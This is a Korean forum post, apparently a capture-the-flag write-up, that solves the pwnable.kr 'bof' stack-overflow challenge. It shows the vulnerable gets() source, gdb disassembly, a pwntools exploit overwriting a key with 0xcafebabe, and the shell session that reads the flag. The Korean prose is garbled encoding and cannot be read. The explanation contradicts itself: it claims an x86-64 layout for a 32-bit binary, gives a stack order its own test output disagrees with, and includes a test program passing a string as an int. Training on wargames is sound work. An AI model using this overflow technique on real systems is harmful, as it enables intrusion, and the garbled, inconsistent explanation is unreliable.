1602, 1/81 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ÇØÅ·ÀßÇÏ°í½Í´Ù
   http://¾øÀ½
   [pwnable.kr] bof

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8591 [º¹»ç]


ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ checksec --file=bof
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH        Symbols                FORTIFY        Fortified        Fortifiable        FILE
Partial RELRO   Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   70 Symbols          No        0                1                bof










checksecÀ¸·Î È®ÀÎÇϸé Canary found°¡ ¶¹´Ù.
´ëÃæ Ä«³ª¸®°¡ µÇ¾î ÀÖ´Ù°í »ý°¢Çߴµ¥ ¼Ò½º¸¦ ÀÚ¼¼È÷ ºÃ´Ù.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);        // smash me!
        if(key == 0xcafebabe){
                system("/bin/sh");
        }
        else{
                printf("Nah..\n");
        }
}

int main(int argc, char* argv[]){
        func(0xdeadbeef);
        return 0;
}

¿©±â¼­ ÇÞ°¥·È´ø °Ç ¸Å°³º¯¼ö int key°¡ ¸®ÅϾîµå·¹½ºº¸´Ù ¾Õ¿¡ ÀÖ´ÂÁö
µÚ¿¡ ÀÖ´ÂÁö Á¤È®ÇÑ °³³äÀÌ »ó±âµÇÁö ¾Ê¾Ò´Ù.
(ÀÌ·¸°Ô ±â¾ï ¾È ³¯ ¶§¸¶´Ù ÀÚÁÖ ¹Ýº¹ÇÏ°í ÇнÀÇϸ鼭 °øºÎ°¡ µÇ´Â °Í °°´Ù)
ÀϹÝÀûÀÎ x86-64 ȯ°æ¿¡¼­, key¿Í overflowme´Â ½ºÅÿ¡ ´ÙÀ½°ú °°Àº ¼ø¼­·Î ¹èÄ¡µÈ´Ù.

RET
SFP
key
overflowme (Áö¿ª º¯¼ö)
µû¶ó¼­, key´Â Ç×»ó ¸®ÅÏ ÁÖ¼Ò ¹× SFPº¸´Ù µÚÂÊ¿¡ À§Ä¡ÇÑ´Ù.

ÀÌ°É È®ÀÎÇϱâ À§ÇØ C·Î °£´ÜÇÑ ÇÁ·Î±×·¥À» ÄÄÆÄÀÏÇؼ­ ½ÇÇàÇß´Ù.


===============================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ cat test.c
#include <stdio.h>

void func(int key)
{
        char overflowme[32];

        printf("Address of overflowme: %p\n", (void*)overflowme);
        printf("Address of key: %p\n", (void*)&key);
}

void main()
{
        func("0xdeadbeef");
}
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ ./test
Address of overflowme: 0x7ffe2575c7c0
Address of key: 0x7ffe2575c7bc
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$
===================================================








ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ pwnable$ gdb -q bof
Reading symbols from bof...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x0000068a <+0>:        push   ebp
   0x0000068b <+1>:        mov    ebp,esp
   0x0000068d <+3>:        and    esp,0xfffffff0
   0x00000690 <+6>:        sub    esp,0x10
   0x00000693 <+9>:        mov    DWORD PTR [esp],0xdeadbeef
   0x0000069a <+16>:        call   0x62c < func>
   0x0000069f <+21>:        mov    eax,0x0
   0x000006a4 <+26>:        leave  
   0x000006a5 <+27>:        ret    
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
   0x0000062c <+0>:        push   ebp
   0x0000062d <+1>:        mov    ebp,esp
   0x0000062f <+3>:        sub    esp,0x48
   0x00000632 <+6>:        mov    eax,gs:0x14
   0x00000638 <+12>:        mov    DWORD PTR [ebp-0xc],eax
   0x0000063b <+15>:        xor    eax,eax
   0x0000063d <+17>:        mov    DWORD PTR [esp],0x78c
   0x00000644 <+24>:        call   0x645 < func+25>
   0x00000649 <+29>:        lea    eax,[ebp-0x2c]
   0x0000064c <+32>:        mov    DWORD PTR [esp],eax
   0x0000064f <+35>:        call   0x650 < func+36>
   0x00000654 <+40>:        cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x0000065b <+47>:        jne    0x66b < func+63>
   0x0000065d <+49>:        mov    DWORD PTR [esp],0x79b
   0x00000664 <+56>:        call   0x665 < func+57>
   0x00000669 <+61>:        jmp    0x677 < func+75>
   0x0000066b <+63>:        mov    DWORD PTR [esp],0x7a3
   0x00000672 <+70>:        call   0x673 < func+71>
   0x00000677 <+75>:        mov    eax,DWORD PTR [ebp-0xc]
   0x0000067a <+78>:        xor    eax,DWORD PTR gs:0x14
   0x00000681 <+85>:        je     0x688 < func+92>
   0x00000683 <+87>:        call   0x684 < func+88>
   0x00000688 <+92>:        leave  
   0x00000689 <+93>:        ret    
End of assembler dump.


¾Æ·¡´Â bof¸¦ °ø·«ÇÒ ¼ö ÀÖ´Â exploitÄÚµåÀÌ´Ù.



from pwn import *

context.log_level = 'debug'

p = remote('pwnable.kr', 9000)
#p = process('./bof')

payload = b'A' * 0x34
payload += p32(0xcafebabe)

p.sendline(payload)

p.interactive()






ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ python3 exploit.py
[+] Opening connection to pwnable.kr on port 9000: Done
[DEBUG] Sent 0x39 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  ¦¢AAAA¦¢AAAA¦¢AAAA¦¢AAAA¦¢
    *
    00000030  41 41 41 41  be ba fe ca  0a                        ¦¢AAAA¦¢¡¤¡¤¡¤¡¤¦¢¡¤¦¢
    00000039
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x1c bytes:
    b'bof\n'
    b'bof.c\n'
    b'flag\n'
    b'log\n'
    b'super.pl\n'
bof
bof.c
flag
log
super.pl
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x20 bytes:
    b'daddy, I just pwned a buFFer :)\n'
daddy, I just pwned a buFFer :)
$  









flag°ªÀº

daddy, I just pwned a buFFer :)

  Hit : 193     Date : 2024/12/25 09:44



    
     [°øÁö] °­Á¸¦ ¿Ã¸®½Ç ¶§´Â ¸»¸Ó¸®¸¦ ´Þ¾ÆÁÖ¼¼¿ä^¤Ñ^ [29] ¸Û¸Û 02/27 19610
1601   ½Ã½ºÅÛ ÄÝ ÃßÀû È®ÀåÆÇ[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/19 126
1600   °£´ÜÇÑ ½Ã½ºÅÛ ÄÝ ÃßÀû ÇÁ·Î±×·¥ ¸¸µé±â     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/18 115
1599   [overthewire.org] - leviathan1     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 146
1598   [overthewire.org] - leviathan0     ÇØÅ·ÀßÇÏ°í½Í´Ù
01/14 138
1597   [Write Up] Crypto Cat's CTF 2024 - BabyFlow     ÇØÅ·ÀßÇÏ°í½Í´Ù
12/29 206
  [pwnable.kr] bof     ÇØÅ·ÀßÇÏ°í½Í´Ù
12/25 192
1595   [pwnable.kr] Shellshock[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 338
1594   ShellshockÀÇ ±âº» ¿ä¾à     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 312
1593   [pwnable.kr] fd     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/23 306
1592   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 287
1591   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/22 359
1590   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 337
1589   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇÏ°í½Í´Ù
11/20 294
1588   [pwnable.kr] cmd1 °ø·«     ÇØÅ·ÀßÇÏ°í½Í´Ù
10/23 458
1587   netdiscover ÆÄÀ̽ãÀ¸·Î ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 714
1586   ÆÄÀ̽ãÀ» ÀÌ¿ëÇÑ ½ÉÇà À¥ Å©·Ñ·¯     ÇØÅ·ÀßÇÏ°í½Í´Ù
08/13 583
1585   ÆÄÀ̽ã random¸ðµâÀ» ÀÌ¿ëÇÑ ¼ýÀÚ¸ÂÃ߱⠰ÔÀÓ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/30 1140
1584   ÆÄÀ̽ã äÆà ÇÁ·Î±×·¥ ±¸Çö     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/28 1061
1583   ÆÄÀ̽㠼ÒÄÏ ÇÁ·Î±×·¡¹ÖÀÇ ±âÃÊ     ÇØÅ·ÀßÇÏ°í½Í´Ù
05/26 1239
1 [2][3][4][5][6][7][8][9][10]..[81]

Copyright 1999-2025 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org